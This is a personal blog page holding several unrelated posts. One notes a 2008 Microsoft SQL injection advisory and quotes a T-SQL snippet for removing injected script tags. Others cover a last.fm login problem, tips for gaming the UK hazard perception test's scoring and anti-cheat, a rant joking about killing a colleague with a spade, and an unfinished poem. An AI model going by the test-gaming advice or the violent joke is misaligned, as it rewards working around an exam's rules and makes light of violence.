Microsoft issues advice on SQL injection attacks

Microsoft is alerting customers to several tools that could bolster Web application development in the wake of a rising number of SQL injection attacks targeting faulty code in websites.

This includes that uc8010 attack which was launched around 28 December 2007. (see here and here for the lowdown on uc8010.

For the record, the attack is about poor programming (or lazy programming at any rate), and Microsoft are keen to point out that:

Is this a security vulnerability that requires Microsoft to issue a security update?
No. Any Web application code that has followed generally accepted best practices for security is significantly less susceptible to the SQL injection attack. Although this is not a security vulnerability, this advisory was issued to provide additional warning and assistance for administrators with vulnerable sites.

Microsoft Security Advisory (954462) Rise in SQL Injection Attacks Exploiting Unverified User Data Input

For those of you who have been recently hit by an SQL injection attack here are some useful resources that I have found:

What do to do if you do not have a backed up copy of your database before the SQL injection attack

hackademix.net has code which *may* reverse the SQL injection attack

This is the crucial piece of code which could save your bacon:

EXEC(
     '
    
update ['+@T+'] set ['+@C+'] = left(
       convert(varchar(8000), ['+@C+']),
       len(convert(varchar(8000), ['+@C+'])) - 6 -
       patindex(''%tpircs<%'',
       reverse(convert(varchar(8000), ['+@C+']))))
     where ['+@C+'] like ''%<script%</script>''
   
'
);
more than likely you will have to modify it for your specific attack. Please check the hackademix.net for full details.

Cannot login to last.fm

Am I the only person in the world that cannot login to last.fm?

I know my username and password are okay, because under some circumstances I authenticate ok. Their forums don’t mention it.  So is it just me? If you have the same problem, please let me know.

(When I enter my login name and password and hit “come on in”, I get dumped to https://www.last.fm/login)

Phah maybe it will be okay tomorrow. I’m using Firefox 3.0.1. They upgraded the site recently, but I can’t believe they broke the login??

How to pass the Hazard Perception Theory Test

I failed this thing the first time I had a crack at it. It is an utterly stupid idea, because it bears no resemblance to driving (or anything else for that matter).

I think the biggest reason why people fail is not because the test itself is stupid. People fail:

  • because they fail to understand the poor (unclear) instructions given
  • because they have misconceptions about what the test is trying to achieve and
  • because they make incorrect assumptions about how the test works.

Traditionally I would rant and rave about how stupid the test is, about its shortcomings and uselessness, but rather than waste all my energy, here is a better idea. I’ll help you to pass the bloody test. Here is what I did, I think anyone else who was worried about it would pass too if they followed the recipe below.

It’s a game. Learn their rules and you should pass pretty easy.

I passed it today, and got a pretty decent 64/75.

How did I prepare?

I bought the The Official DSA Guide to Hazard Perception DVD. I also actually watched the whole bloody DVD, and practised the test until I regularly scored 5/5. It took < 1 hour.

Buy the DVD it is worth the £10 quid. You can always flog it back on Amazon.

download

There were other KEY bits of information I armed myself with:

Part A: How not to fail

Question
The roadsense video says you have to identify ‘developing hazards’ but you would not lose points for identifying non-developing hazards, however I clicked once on every ‘developing hazard’ and once on every non-developing hazard on my test and I failed. Why is that?

Answer
We have been told by the DSA that pressing the mouse button too much will result in you getting no score. This is resulting in a lot of people just clicking once on each hazard. Each scoreable hazard has a marking window and a score is awarded when you respond in that window. The earlier the developing hazard is identified and a response is made the higher the score. You won’t score any points if you respond outside the window and you could lose all the points already gained on the video clip.

We have been getting reports that the hazard window opens not when the hazard is first viewed but a few seconds after. This is resulting in many candidates not scoring because they are clicking just once (when the hazard is showing but the marking window is not opened.)

If you click a few times during each hazard you are likely to score, which will result in a pass. We already know of candidates who have failed the hazard test because they have just clicking once on each hazard. It would appear you have a better chance of passing if the mouse is clicked a few times when you see a developing hazard. BUT STOP CLICKING when the hazard has passed. ( you only lose points responding outside the window).

my note
I certainly clicked between 10-15 times for each video during today’s test, and that seemed to work pretty good. I did f*** up on the last question and scored a big fat zero. So do be careful!!!!

You do need to be careful though. Because if you make lots of unnecessary responses in a very short space of time, or throughout the clip, you will score 0 for that clip. If this happens you will see a warning message on screen at the end of the clip.

my note
The one criticism I would say of the Offical DVD is that it NEVER failed me, I deliberately over clicked the damned thing, but it never said that I had over done it. I think they want (need) to keep that part of the test a secret, or the test would become very formulaic.

Nicked from http://www.2pass.co.uk/faqhazard.htm#twelve

Part B: About the Hazard Perception Test

Introduction

This part of the theory test requires you to view 14 hazard video clips on the computer screen of approximately one minute each. You are required to watch these clips as if you were the driver. There will be 15 hazards to find – at least one on each clip. However, one clip will have 2 hazards. The hazard clips will not contain any sound – just like the old silent movies.

You click either the left or right mouse button whenever you think you can see a hazard developing. The speed at which you click the mouse button as a hazard develops will determine your score for that particular hazard clip. You can score between 0 and 5 on each hazard. Therefore the maximum you can score is 75 (i.e. 15 hazards x 5). To pass you need a score of 44.

The examination process

The hazard perception part of the theory test will start with a short video tutorial played on the computer screen that will explain how the hazard perception test works and what you are required to do. At the end of this clip you have the option to go onto the test or play the tutorial again.

Each hazard clip will start with a freeze frame of the start of the video sequence and a count down from 10 will commence. At the end of the count down the clip will start to play and you will be required to click the mouse button each time you see a developing hazard.

Hazard Percetion Clip

To let you know that the program has registered your click a red flag will appear on a grey band across the bottom of the screen – one flag for each click you make in any particular clip. At the end of the clip all the flags will be removed before you start the next clip.

Although each clip contains several potential hazards only the one that materialises into a real hazard and involves other road users is marked . This is known as a “developing hazard”. Therefore you will only receive a score if you spot a hazard before it fully materialises and is brought about by the action of another road user. You will know if the hazard materialises because the driver will have to take evasive action (e.g. slow down, stop or swerve out of the way).

How to score

The score you obtain will be dependant upon how quickly you spot the developing hazard. The time from when the developing hazard could be potentially seen on the screen to when the vehicle arrives at the hazard is the time frame or window used to determine your score.

Timeline

This window of time is divided into 5 equal segments. If you click the mouse while in the first segment (i.e. just as the developing hazard appears) you will obtain the maximum score of 5 points. If you click in the second segment of this window of time you will score 4 points, then 3, then 2 and then in the last segment just 1. This is accurate to one twenty fifth of a second.

If you click several times during this window of time the computer will always take your highest score and record that for that particular clip. If you don’t click the mouse button in this window of time you will score nothing in respect to that hazard.

If you try to cheat the system by clicking the button repeatedly throughout the video clip the computer program will pick this up. It does this by analysing the number of clicks over the clip as a whole and the pattern of clicks. There is a certain maximum number of permitted clicks for any clip and this is believed to bo around 20.

The anti-cheat will potentially be activated if you click rapidly in a burst of 3 or more clicks or if you click in a pattern. If the computer program determines that you may be cheating a message window will appear at the end of the clip letting you know that an irregular clicking activity was detected and that as a result the score for that clip will be zero.

When the clip ends the screen will turn black for a few seconds before the freeze frame for the next video clip appears and the count down commences again, warning you to get ready. This pattern is repeated until all 14 video clips have been shown.

At the end of the hazard perception part of the theory test you will be given the option to complete a customer care survey if you so wish.

You will then be directed to leave the room and collect your score for the two parts of the exam. The maximum score that can be obtained for the hazard perception part of the theory test is 75 (i.e. 15×5). To pass the hazard perception part of the car, moped and motorcycle theory test you must obtain a score of 44. To pass the theory test you must pass both parts. If you fail either part you are required to take both parts of the test again.

Hints and tips

When watching the video clips do not be frightened to click the mouse button whenever you see a potential hazard involving another road user (i.e. anything that you think may cause the driver to change speed, position or direction). Watch the hazard and if it continues to materialise continue to click the mouse button each time the situation changes. This is the advice given by the hazard perception test introduction video played before you start the actual test. By doing this you will ensure that you click within the scoring window.

Some of these potential hazards will not materialise and therefore you will not receive a score for spotting them. For example, if the cyclist shown in the developing hazard sequence on the previous illustration stopped at the end of the side road (i.e. at the 4 point stage) the hazard would not have materialised. In the actual clip the cyclist was travelling too fast to stop. This was the real clue to what was going to happen next.

In a few instances it is difficult to determine when a potential hazard becomes a developing hazard and therefore when the scoring window should start. This is why it is safer to click a few times as you see the hazard develop to make sure you don’t click too early and miss the opening of this window. However, don’t click in a pattern only click in responce to actual changes and avoid a rapid burst of clicks.

Hazard Perception Test Clip

In the example above (supplied by the DSA) you will notice a very young child riding a bike on the pavement. This alone may be classified as a potential hazard, particularly as the child is unsupervised.

However, the scoring window on this clip doesn’t open until the child starts to turn towards the road to cross it as shown below and highlighted by the red circle. This is the point at which the potential hazard becomes a developing hazard and the scoring window opens.

Hazard Perception Test Clip 2

Therefore if you had only clicked your mouse button once as you saw the child riding her bike along the pavement you would have scored zero. Therefore, remember to click the button a couple of times as the hazard develops to avoid this problem. More advice about this and how to deal with each hazard type can be found in the next section.

Nicked from http://www.theorytestadvice.co.uk/thetests/abouthpt.htm

Part C: Types of Hazards

my note
In other words, when you see one of these, it is almost definitely going to be your HAZARD. Be warned.

  1. Zebra crossings & traffic controllers
  2. Pedestrians: Children & young adults
  3. Pedestrians: Elderly & infirm
  4. Pedestrians: Adults
  5. Cyclists & motorcyclists
  6. Horse riders & other animals
  7. Vehicles: moving off or pulling up
  8. Vehicles: meeting
  9. Vehicles: emerging
  10. Vehicles: turning left or right
  11. Vehicles: reversing & U-turns
  12. Vehicles: larger Vehicles
  13. Vehicles: flashing lights

Get more details from: http://www.theorytestadvice.co.uk/thetests/hptypes.htm

Part D: Watch this video

I watched this YouTube video: How to pass the Hazard Perception part of the Theory Test .

Buy the DVD!!!

download

or

71oLmLfcwiL._SL1111_

Don’t ask

Much ado about nothing. No, really.

Before I give myself and ulcer, I decided to stop getting hyper about (seemingly) unimportant things.

Problem: There is never anything good on TV.

Synopsis: That’s a fact, and that is probably the #1 reason why I don’t watch as much TV as I’ld like to. Given half a chance, I’ld happily watch Judge Judy and Jerry Springer for hours on end, though I’ld rather be watching Justice League cartoons, or Star Trek re-runs. Of course a lesser blogger would turn this idea into a 14,000 word essay on the demise of western civilisation. Or maybe global warming. But I got a better idea.

Solution: Don’t rely on TV.


Problem: You can become a project manager

Synopsis: this is an affront to intelligent people everywhere. i’m not saying that one doesn’t need to plan and prepare. i’m just saying that if you call it project management, then you are a loser. my boss recently employed someone because they “practise project management principles” and told me I could get some tips from him.

It took every ounce of my rather feeble will power not to go to my local hardware store, and return with a garden spade and smack every last ounce of life from her body.

I digress.

Solution: keep a garden spade in the office.

no one ever taught me how
to watch a television
like a baby i knew my candy
no one ever caught me
when i learned to ride a bicycle
and like the pavement embraced my skin
no one ever warned me
about that television
now i’m brain-dead at twenty seven
no one ever mended my
lumps and bruises
and now it’s hard to breathe
with a broken nose

wheat in no one ever told me